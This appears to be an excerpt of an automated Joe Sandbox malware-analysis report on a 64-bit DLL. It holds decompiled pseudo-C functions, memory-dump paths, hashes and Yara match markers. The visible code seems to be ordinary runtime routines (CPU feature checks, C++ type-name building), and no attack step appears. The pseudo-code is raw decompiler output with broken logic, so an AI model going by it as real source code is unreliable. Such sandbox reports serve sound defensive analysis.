                                                                      				if ( *((intOrPtr*)(_t65 + 0x470)) != 1) goto 0x80019632;
                                                                      				_t42 =  *((intOrPtr*)(_t65 + 0x34));
                                                                      				r9d =  *(_t62 + 0x3a) & 0x0000ffff;
                                                                      				_t69 = _t62 + (_t56 + _t56 * 2 + 0x90) * 8;
                                                                      				if ( *_t69 != 0) goto 0x800195ee;
                                                                      				 *_t69 = 4;
                                                                      				 *((intOrPtr*)(_t69 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t69 + 0x10)) = _t42;
                                                                      				dil = 1;
                                                                      				goto 0x80019644;
                                                                      				_v24 = _t42;
                                                                      				r8d = 4;
                                                                      				if (E00000001180024A10(_t62, _t62, _t69, _t71, _t77) != 0) goto 0x800195e6;
                                                                      				_t59 =  *((intOrPtr*)(_t62 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t59 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t62 + 8));
                                                                      				_v24 = _t70;
                                                                      				E00000001180013858( *((intOrPtr*)(_t62 + 8)), _t62, _t62, _t69, _t71, _t72, _t76);
                                                                      				goto 0x800195e9;
                                                                      				asm("movsd xmm0, [ecx]");
                                                                      				asm("movsd [edx], xmm0");
                                                                      				return 1;
                                                                      			}

















                                                                      0x180019548
                                                                      0x180019559
                                                                      0x18001955c
                                                                      0x18001955e
                                                                      0x180019563
                                                                      0x180019567
                                                                      0x18001956c
                                                                      0x18001957b
                                                                      0x18001957d
                                                                      0x180019583
                                                                      0x180019586
                                                                      0x18001958b
                                                                      0x18001958f
                                                                      0x180019596
                                                                      0x18001959c
                                                                      0x1800195a1
                                                                      0x1800195a6
                                                                      0x1800195ad
                                                                      0x1800195bd
                                                                      0x1800195bf
                                                                      0x1800195c9
                                                                      0x1800195ce
                                                                      0x1800195d6
                                                                      0x1800195d8
                                                                      0x1800195de
                                                                      0x1800195e3
                                                                      0x1800195e6
                                                                      0x1800195ec
                                                                      0x1800195ee
                                                                      0x1800195f2
                                                                      0x180019602
                                                                      0x180019604
                                                                      0x180019608
                                                                      0x18001960b
                                                                      0x180019612
                                                                      0x180019616
                                                                      0x180019621
                                                                      0x180019626
                                                                      0x18001962b
                                                                      0x180019630
                                                                      0x18001963a
                                                                      0x180019640
                                                                      0x18001964e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1f54a980e7cb41129d3eab13618fd4a596d60a72059e2b35ac37a74938aa00af
                                                                      • Instruction ID: 012a784c5dacf3ce5efe67161a1e366ef22d3a4e74041e82062d69a913afe1f5
                                                                      • Opcode Fuzzy Hash: 1f54a980e7cb41129d3eab13618fd4a596d60a72059e2b35ac37a74938aa00af
                                                                      • Instruction Fuzzy Hash: 2831C072205E88C6EB66CF29E0413AD77A1F399B88F248115EB4D4B750DF36C296CB14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E00000001180019650(void* __eax, long long __rbx, long long __rcx, void* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t42;
                                                                      				intOrPtr _t55;
                                                                      				signed long long _t56;
                                                                      				intOrPtr _t59;
                                                                      				void* _t62;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr* _t69;
                                                                      				long long _t70;
                                                                      				void* _t71;
                                                                      				void* _t72;
                                                                      				void* _t76;
                                                                      				void* _t77;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t62 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019679;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t65 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				asm("movsd xmm0, [ecx-0x8]");
                                                                      				goto 0x80019746;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800196ba;
                                                                      				_t55 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t55 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t55 + 0x2c)) = 0x16;
                                                                      				_t56 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t56;
                                                                      				_v24 = _t70;
                                                                      				E00000001180013858(_t56, __rcx, _t65, __rdx, _t71, _t72, _t76);
                                                                      				goto 0x8001974c;
                                                                      				if ( *((intOrPtr*)(_t65 + 0x470)) != 1) goto 0x8001973a;
                                                                      				_t42 =  *((intOrPtr*)(_t65 + 0x34));
                                                                      				r9d =  *(_t62 + 0x3a) & 0x0000ffff;
                                                                      				_t69 = _t62 + (_t56 + _t56 * 2 + 0x90) * 8;
                                                                      				if ( *_t69 != 0) goto 0x800196f6;
                                                                      				 *_t69 = 4;
                                                                      				 *((intOrPtr*)(_t69 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t69 + 0x10)) = _t42;
                                                                      				dil = 1;
                                                                      				goto 0x8001974c;
                                                                      				_v24 = _t42;
                                                                      				r8d = 4;
                                                                      				if (E00000001180024C14(_t62, _t62, _t69, _t71, _t77) != 0) goto 0x800196ee;
                                                                      				_t59 =  *((intOrPtr*)(_t62 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t59 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t62 + 8));
                                                                      				_v24 = _t70;
                                                                      				E00000001180013858( *((intOrPtr*)(_t62 + 8)), _t62, _t62, _t69, _t71, _t72, _t76);
                                                                      				goto 0x800196f1;
                                                                      				asm("movsd xmm0, [ecx]");
                                                                      				asm("movsd [edx], xmm0");
                                                                      				return 1;
                                                                      			}

















                                                                      0x180019650
                                                                      0x180019661
                                                                      0x180019664
                                                                      0x180019666
                                                                      0x18001966b
                                                                      0x18001966f
                                                                      0x180019674
                                                                      0x180019683
                                                                      0x180019685
                                                                      0x18001968b
                                                                      0x18001968e
                                                                      0x180019693
                                                                      0x180019697
                                                                      0x18001969e
                                                                      0x1800196a4
                                                                      0x1800196a9
                                                                      0x1800196ae
                                                                      0x1800196b5
                                                                      0x1800196c5
                                                                      0x1800196c7
                                                                      0x1800196d1
                                                                      0x1800196d6
                                                                      0x1800196de
                                                                      0x1800196e0
                                                                      0x1800196e6
                                                                      0x1800196eb
                                                                      0x1800196ee
                                                                      0x1800196f4
                                                                      0x1800196f6
                                                                      0x1800196fa
                                                                      0x18001970a
                                                                      0x18001970c
                                                                      0x180019710
                                                                      0x180019713
                                                                      0x18001971a
                                                                      0x18001971e
                                                                      0x180019729
                                                                      0x18001972e
                                                                      0x180019733
                                                                      0x180019738
                                                                      0x180019742
                                                                      0x180019748
                                                                      0x180019756

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1895c422027262ba3051d7221336d00ac2dcaa50cbb928c6167e989278d9afa
                                                                      • Instruction ID: d908f2e6769887bc82199d8e38dedcd7a19c3bfcd7feab257f7cbaf66ea8387d
                                                                      • Opcode Fuzzy Hash: e1895c422027262ba3051d7221336d00ac2dcaa50cbb928c6167e989278d9afa
                                                                      • Instruction Fuzzy Hash: 8F31E372215A88C6EBA6CF29E0403AD77A0F78DB8CF248115EB4C0B751DF36C196CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 28ec5479fc9c20a5c4ee2cbe5a95cc75b34517503f37ad4c7376377d5f1ddfb5
                                                                      • Instruction ID: c534fdd86d021aff7810f7780ddf29bd95b1a53f02d99f141037f9b8417bffa5
                                                                      • Opcode Fuzzy Hash: 28ec5479fc9c20a5c4ee2cbe5a95cc75b34517503f37ad4c7376377d5f1ddfb5
                                                                      • Instruction Fuzzy Hash: 6531B0B050078E8FDB48CF64D88A5DE3FB1FB48348F110A19F86AA6254D7B4D665CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15b66e333b2d3df4a68563296aca916e451c710b76b5e65da49b60ab6bd77c42
                                                                      • Instruction ID: 422a9a96b60d90f09faa0fb65139306ba85052ea2442a1f81b75dd6f28c60892
                                                                      • Opcode Fuzzy Hash: 15b66e333b2d3df4a68563296aca916e451c710b76b5e65da49b60ab6bd77c42
                                                                      • Instruction Fuzzy Hash: CD317FB4529381AFD3D8DF28D19A81BBBE0FBC9308F806A1DF8CA86250D7759445CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00000001180059100(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				void* _t25;
                                                                      
                                                                      				_t25 = __r8;
                                                                      				r8d = 0;
                                                                      				 *0x80072728 = r8d;
                                                                      				_t1 = _t25 + 1; // 0x1
                                                                      				r9d = _t1;
                                                                      				asm("cpuid");
                                                                      				_v16 = r9d;
                                                                      				_v16 = 0;
                                                                      				_v20 = __ebx;
                                                                      				_v12 = __edx;
                                                                      				if (0 != 0x18001000) goto 0x80059161;
                                                                      				asm("xgetbv");
                                                                      				_a8 = __rdx << 0x00000020 | __rax;
                                                                      				r8d =  *0x80072728; // 0x1
                                                                      				r8d =  ==  ? r9d : r8d;
                                                                      				 *0x80072728 = r8d;
                                                                      				 *0x8007272c = r8d;
                                                                      				return 0;
                                                                      			}







                                                                      0x180059100
                                                                      0x180059106
                                                                      0x18005910b
                                                                      0x180059112
                                                                      0x180059112
                                                                      0x180059119
                                                                      0x18005911b
                                                                      0x180059123
                                                                      0x180059129
                                                                      0x18005912d
                                                                      0x180059133
                                                                      0x180059137
                                                                      0x180059141
                                                                      0x18005914b
                                                                      0x180059156
                                                                      0x18005915a
                                                                      0x180059161
                                                                      0x18005916f

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ac3a5e70e023206e64bfa2ea13717cc55e5129e4b432c195b3d0e566b8d9e66e
                                                                      • Instruction ID: 303d9d70471205122b773f30fe16a941e504e0d3e03310cf2558e27d9dbeae5e
                                                                      • Opcode Fuzzy Hash: ac3a5e70e023206e64bfa2ea13717cc55e5129e4b432c195b3d0e566b8d9e66e
                                                                      • Instruction Fuzzy Hash: B3F062717186988ADFEA8F28A94275977E0F30C3C0F90C019E689C3B04D63E8164CF18
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e94f50c2ec557741c518195929cc555865dba833429b878653d06e621f2bf460
                                                                      • Instruction ID: 3727ec4b8f6e5ec96dc44c39b26f8891e1110b02b995e3c015258a7912a68aad
                                                                      • Opcode Fuzzy Hash: e94f50c2ec557741c518195929cc555865dba833429b878653d06e621f2bf460
                                                                      • Instruction Fuzzy Hash: B9A00231204D0CF4E697DB05E852390333CE359380F449013F04D518A09F3D878DC302
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 67%
                                                                      			E00000001180007BF0(void* __edi, long long __rbx, long long* __rcx, void* __rdx, long long __rdi, void* __rsi, long long __r14, long long __r15, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				signed int _v16;
                                                                      				signed int _v24;
                                                                      				signed char _v32;
                                                                      				char _v40;
                                                                      				signed int _v48;
                                                                      				signed int _v56;
                                                                      				signed int _t104;
                                                                      				signed int _t124;
                                                                      				signed int _t125;
                                                                      				signed int _t132;
                                                                      				signed int _t134;
                                                                      				void* _t137;
                                                                      				void* _t141;
                                                                      				signed char _t148;
                                                                      				signed char _t160;
                                                                      				void* _t162;
                                                                      				void* _t164;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void* _t170;
                                                                      				void* _t171;
                                                                      				signed int _t172;
                                                                      				void* _t173;
                                                                      				void* _t175;
                                                                      				signed int _t182;
                                                                      				void* _t191;
                                                                      				signed char* _t192;
                                                                      				signed char* _t194;
                                                                      				long long* _t196;
                                                                      				long long* _t209;
                                                                      				long long _t215;
                                                                      				long long* _t218;
                                                                      				signed long long* _t252;
                                                                      				long long* _t269;
                                                                      				void* _t272;
                                                                      				void* _t275;
                                                                      				signed char* _t278;
                                                                      				signed char* _t280;
                                                                      				void* _t284;
                                                                      				long long _t285;
                                                                      
                                                                      				_t285 = __r14;
                                                                      				_t271 = __rsi;
                                                                      				_t162 = __edi;
                                                                      				_t191 = _t275;
                                                                      				 *((long long*)(_t191 + 8)) = __rbx;
                                                                      				 *((long long*)(_t191 + 0x10)) = __rdi;
                                                                      				 *((long long*)(_t191 + 0x18)) = __r14;
                                                                      				 *((long long*)(_t191 + 0x20)) = __r15;
                                                                      				_t192 =  *0x80071308; // 0x0
                                                                      				_t208 = __rdx;
                                                                      				_t269 = __rcx;
                                                                      				r14d =  *_t192 & 0x000000ff;
                                                                      				if (r14b == 0) goto 0x80008162;
                                                                      				_v56 = _v56 & 0x00000000;
                                                                      				_t7 =  &(_t192[1]); // 0x1
                                                                      				_t278 = _t7;
                                                                      				_v48 = _v48 & 0x00000000;
                                                                      				r15b = 0;
                                                                      				 *0x80071308 = _t278;
                                                                      				_t125 = r14d;
                                                                      				_t164 = r14d - 0x58;
                                                                      				if (_t164 > 0) goto 0x80007d5e;
                                                                      				if (_t164 == 0) goto 0x80007d4c;
                                                                      				_t165 = _t125 - 0x4b;
                                                                      				if (_t165 > 0) goto 0x80007cca;
                                                                      				if (_t165 == 0) goto 0x80007c82;
                                                                      				if (_t165 == 0) goto 0x80007cb8;
                                                                      				if (_t165 == 0) goto 0x80007cb8;
                                                                      				if (_t165 == 0) goto 0x80007cb8;
                                                                      				if (_t165 == 0) goto 0x80007ca6;
                                                                      				if (_t165 == 0) goto 0x80007ca6;
                                                                      				if (_t165 == 0) goto 0x80007c94;
                                                                      				_t132 = _t125 - 0x3d;
                                                                      				if (_t165 == 0) goto 0x80007c94;
                                                                      				_t166 = _t132 - 1;
                                                                      				if (_t166 != 0) goto 0x80007d63;
                                                                      				r8d = 4;
                                                                      				goto 0x80008099;
                                                                      				r8d = 3;
                                                                      				goto 0x80008099;
                                                                      				r8d = 5;
                                                                      				goto 0x80008099;
                                                                      				r8d = 4;
                                                                      				goto 0x80008099;
                                                                      				if (_t166 == 0) goto 0x80007d3a;
                                                                      				if (_t166 == 0) goto 0x80007d0d;
                                                                      				if (_t166 == 0) goto 0x80007cf7;
                                                                      				if (_t166 == 0) goto 0x80007cef;
                                                                      				if (_t166 == 0) goto 0x80007cef;
                                                                      				if (_t166 == 0) goto 0x80007cef;
                                                                      				if (_t132 - 0x48 != 1) goto 0x80007d63;
                                                                      				goto 0x80007f1c;
                                                                      				r8d = 5;
                                                                      				E00000001180005714(_t192, __rdx,  &_v56, "long ", __rcx, __rsi);
                                                                      				_v16 = 6;
                                                                      				_v24 = "double";
                                                                      				asm("movaps xmm0, [ebp-0x10]");
                                                                      				asm("movdqa [ebp-0x10], xmm0");
                                                                      				E00000001180006010(_t132 - 0x48, _t162, "double", __rdx,  &_v56,  &_v24, _t271);
                                                                      				goto 0x800080a2;
                                                                      				r8d = 5;
                                                                      				goto 0x80008099;
                                                                      				r8d = 4;
                                                                      				goto 0x80008099;
                                                                      				if ((_t132 & 0x00000003) == 0x5f) goto 0x80007d98;
                                                                      				_t15 = _t278 - 1; // 0x0
                                                                      				_t194 = _t15;
                                                                      				 *0x80071308 = _t194;
                                                                      				E0000000118000929C(_t132 & 0x00000003, _t132 - 0x48, _t208,  &_v24, _t269, _t278, _t284);
                                                                      				_t215 =  *_t194;
                                                                      				_t160 = _t194[8];
                                                                      				_v56 = _t215;
                                                                      				_v48 = _t160;
                                                                      				if (_t215 != 0) goto 0x800080a2;
                                                                      				 *_t269 = _t215;
                                                                      				 *(_t269 + 8) = _t160;
                                                                      				goto 0x80008180;
                                                                      				r15d =  *_t278 & 0x000000ff;
                                                                      				_t21 =  &(_t278[1]); // 0x2
                                                                      				 *0x80071308 = _t21;
                                                                      				_t134 = r15d;
                                                                      				_t170 = r15d - 0x4d;
                                                                      				if (_t170 > 0) goto 0x80007eb3;
                                                                      				if (_t170 == 0) goto 0x80007e7d;
                                                                      				_t171 = _t134 - 0x47;
                                                                      				if (_t171 > 0) goto 0x80007e60;
                                                                      				if (_t171 == 0) goto 0x80007de2;
                                                                      				_t172 = r15b;
                                                                      				if (_t172 == 0) goto 0x80007e42;
                                                                      				if (_t172 == 0) goto 0x80007e06;
                                                                      				if (_t172 == 0) goto 0x80007df4;
                                                                      				_t137 = _t134 - 3;
                                                                      				if (_t172 == 0) goto 0x80007df4;
                                                                      				_t173 = _t137 - 1;
                                                                      				if (_t173 != 0) goto 0x80008053;
                                                                      				r8d = 7;
                                                                      				goto 0x80008099;
                                                                      				r8d = 6;
                                                                      				goto 0x80008099;
                                                                      				_t196 = "__w64 ";
                                                                      				_v16 = 6;
                                                                      				_v24 = _t196;
                                                                      				asm("movaps xmm0, [ebp-0x10]");
                                                                      				asm("movdqa [ebp-0x10], xmm0");
                                                                      				E00000001180007BF0(_t162, _t208,  &_v40, "__int8", _t269, _t271, __r14, __r15);
                                                                      				_t209 = _t196;
                                                                      				E000000011800059CC(_t196,  &_v56,  &_v24);
                                                                      				_t218 = _t196;
                                                                      				goto 0x80008175;
                                                                      				 *0x80071308 = _t278;
                                                                      				_v56 = 0x8005f780;
                                                                      				_v48 = 1;
                                                                      				goto 0x800080a2;
                                                                      				if (_t173 == 0) goto 0x80007ea1;
                                                                      				if (_t173 == 0) goto 0x80007ea1;
                                                                      				if (_t173 == 0) goto 0x80007e8f;
                                                                      				_t141 = _t137 - 0x45;
                                                                      				if (_t173 == 0) goto 0x80007e8f;
                                                                      				if (_t141 != 1) goto 0x80008053;
                                                                      				r8d = 8;
                                                                      				goto 0x80008099;
                                                                      				r8d = 7;
                                                                      				goto 0x80008099;
                                                                      				r8d = 7;
                                                                      				goto 0x80008099;
                                                                      				_t175 = _t141 - 0x53;
                                                                      				if (_t175 > 0) goto 0x8000803a;
                                                                      				if (_t175 == 0) goto 0x8000802b;
                                                                      				if (_t175 == 0) goto 0x8000801c;
                                                                      				if (_t175 == 0) goto 0x80007f17;
                                                                      				if (_t175 == 0) goto 0x80007f05;
                                                                      				if (_t175 == 0) goto 0x80007ef3;
                                                                      				if (_t141 - 0x4b != 1) goto 0x80008053;
                                                                      				_t29 = _t218 + 8; // -73
                                                                      				r8d = _t29;
                                                                      				goto 0x80008099;
                                                                      				r8d = 7;
                                                                      				goto 0x80008099;
                                                                      				r8d = 4;
                                                                      				goto 0x80008099;
                                                                      				_v56 = _v56 & 0x00000000;
                                                                      				_v48 = _v48 & 0x00000000;
                                                                      				_t104 =  *(_t209 + 8);
                                                                      				_v24 =  *_t209;
                                                                      				_v16 = _t104;
                                                                      				if (0xfffffffe != 0xfffffffe) goto 0x80007f96;
                                                                      				r9d = 0;
                                                                      				_v16 = _t104 | 0x00000800;
                                                                      				E0000000118000B1C8(_t160, _t162, _t209,  &_v40,  &_v56, _t269, _t271,  &_v24, _t272);
                                                                      				if ((0x00000800 & _v32) != 0) goto 0x80007f87;
                                                                      				_v16 = 2;
                                                                      				_v24 = 0x8005eb10;
                                                                      				_t252 =  &_v24;
                                                                      				asm("movaps xmm0, [ebp-0x10]");
                                                                      				asm("movdqa [ebp-0x10], xmm0");
                                                                      				E00000001180006010(_t160, _t162, 0x8005eb10, _t209,  &_v40, _t252, _t271);
                                                                      				_t148 = _v32;
                                                                      				 *_t269 = _v40;
                                                                      				 *(_t269 + 8) = _t148;
                                                                      				goto 0x80008180;
                                                                      				if (_t252 != 0) goto 0x80008001;
                                                                      				_t124 = _t148 & 0x00000002;
                                                                      				if ((_t148 & 0x00000001) == 0) goto 0x80007fe7;
                                                                      				_t53 = _t252 + 5; // 0x5
                                                                      				r8d = _t53;
                                                                      				E00000001180005714(_v40, _t209,  &_v56, "const", _t269, _t271);
                                                                      				if (_t124 == 0) goto 0x80008001;
                                                                      				_v32 = 9;
                                                                      				_v40 = " volatile";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E00000001180006010(_t160, _t162, " volatile", _t209,  &_v56,  &_v40, _t271);
                                                                      				goto 0x80008001;
                                                                      				_t182 = _t124;
                                                                      				if (_t182 == 0) goto 0x80008001;
                                                                      				r8d = 8;
                                                                      				E00000001180005714(" volatile", _t209,  &_v56, "volatile", _t269, _t271);
                                                                      				r9d = 1;
                                                                      				_t280 =  &_v24;
                                                                      				E0000000118000B1C8(_t160, _t162, _t209, _t269,  &_v56, _t269, _t271, _t280);
                                                                      				goto 0x80008180;
                                                                      				r8d = 4;
                                                                      				goto 0x80008099;
                                                                      				r8d = 8;
                                                                      				goto 0x80008099;
                                                                      				if (_t182 == 0) goto 0x8000808c;
                                                                      				if (_t182 == 0) goto 0x8000807d;
                                                                      				if (_t182 == 0) goto 0x8000806e;
                                                                      				if (_t182 == 0) goto 0x80008062;
                                                                      				if (_t148 - 0x50 == 1) goto 0x80008062;
                                                                      				r8d = 7;
                                                                      				goto 0x80008099;
                                                                      				 *0x80071308 = _t280;
                                                                      				goto 0x80007d6e;
                                                                      				r8d = 7;
                                                                      				goto 0x80008099;
                                                                      				r8d = 8;
                                                                      				goto 0x80008099;
                                                                      				r8d = 0xe;
                                                                      				E00000001180005714(" volatile", _t209,  &_v56, "decltype(auto)", _t269, _t271);
                                                                      				if (r14b == 0x43) goto 0x800080d6;
                                                                      				_t63 = _t285 - 0x45; // -69
                                                                      				if ((_t63 & 0x000000f9) == 0) goto 0x800080c6;
                                                                      				if (r14b != 0x5f) goto 0x8000811c;
                                                                      				r15b = r15b - 0x45;
                                                                      				if (r15b - 8 > 0) goto 0x8000811c;
                                                                      				if ((r15b & 0x00000001) != 0) goto 0x8000811c;
                                                                      				_v16 = 9;
                                                                      				goto 0x800080e4;
                                                                      				_v16 = 7;
                                                                      				_v24 = "signed ";
                                                                      				asm("movaps xmm0, [ebp-0x10]");
                                                                      				asm("movdqa [ebp-0x10], xmm0");
                                                                      				E000000011800059CC("signed ",  &_v40,  &_v24);
                                                                      				E00000001180005F48("signed ",  &_v24,  &_v56);
                                                                      				_v56 = _v24;
                                                                      				_v48 = _v16;
                                                                      				if ( *_t209 == 0) goto 0x80008153;
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v16 = _v16 & 0x00000000;
                                                                      				E00000001180007320(0x20, _v24, _t209,  &_v24);
                                                                      				E00000001180005F48( &_v24,  &_v40, _t209);
                                                                      				E00000001180006090(_t148 - 0x50,  &_v56,  &_v40, _t209);
                                                                      				 *_t269 = _v56;
                                                                      				 *(_t269 + 8) = _v48;
                                                                      				goto 0x80008180;
                                                                      				_v16 = _v16 & 0x00000000;
                                                                      				_v24 = 0x8005f780;
                                                                      				return E00000001180005F48( &_v24, _t269, _t209);
                                                                      			}











































                                                                      0x180007bf0
                                                                      0x180007bf0
                                                                      0x180007bf0
                                                                      0x180007bf0
                                                                      0x180007bf3
                                                                      0x180007bf7
                                                                      0x180007bfb
                                                                      0x180007bff
                                                                      0x180007c0b
                                                                      0x180007c12
                                                                      0x180007c15
                                                                      0x180007c18
                                                                      0x180007c1f
                                                                      0x180007c25
                                                                      0x180007c2a
                                                                      0x180007c2a
                                                                      0x180007c2e
                                                                      0x180007c32
                                                                      0x180007c35
                                                                      0x180007c3c
                                                                      0x180007c3f
                                                                      0x180007c43
                                                                      0x180007c49
                                                                      0x180007c4f
                                                                      0x180007c52
                                                                      0x180007c54
                                                                      0x180007c59
                                                                      0x180007c5e
                                                                      0x180007c63
                                                                      0x180007c68
                                                                      0x180007c6d
                                                                      0x180007c72
                                                                      0x180007c74
                                                                      0x180007c77
                                                                      0x180007c79
                                                                      0x180007c7c
                                                                      0x180007c82
                                                                      0x180007c8f
                                                                      0x180007c94
                                                                      0x180007ca1
                                                                      0x180007ca6
                                                                      0x180007cb3
                                                                      0x180007cb8
                                                                      0x180007cc5
                                                                      0x180007ccf
                                                                      0x180007cd4
                                                                      0x180007cd9
                                                                      0x180007cde
                                                                      0x180007ce3
                                                                      0x180007ce8
                                                                      0x180007ced
                                                                      0x180007cf2
                                                                      0x180007cf7
                                                                      0x180007d08
                                                                      0x180007d0d
                                                                      0x180007d1b
                                                                      0x180007d23
                                                                      0x180007d2b
                                                                      0x180007d30
                                                                      0x180007d35
                                                                      0x180007d3a
                                                                      0x180007d47
                                                                      0x180007d4c
                                                                      0x180007d59
                                                                      0x180007d61
                                                                      0x180007d63
                                                                      0x180007d63
                                                                      0x180007d67
                                                                      0x180007d72
                                                                      0x180007d77
                                                                      0x180007d7a
                                                                      0x180007d7d
                                                                      0x180007d81
                                                                      0x180007d87
                                                                      0x180007d8d
                                                                      0x180007d90
                                                                      0x180007d93
                                                                      0x180007d98
                                                                      0x180007d9c
                                                                      0x180007da0
                                                                      0x180007da7
                                                                      0x180007daa
                                                                      0x180007dae
                                                                      0x180007db4
                                                                      0x180007dba
                                                                      0x180007dbd
                                                                      0x180007dc3
                                                                      0x180007dc5
                                                                      0x180007dc8
                                                                      0x180007dcd
                                                                      0x180007dd2
                                                                      0x180007dd4
                                                                      0x180007dd7
                                                                      0x180007dd9
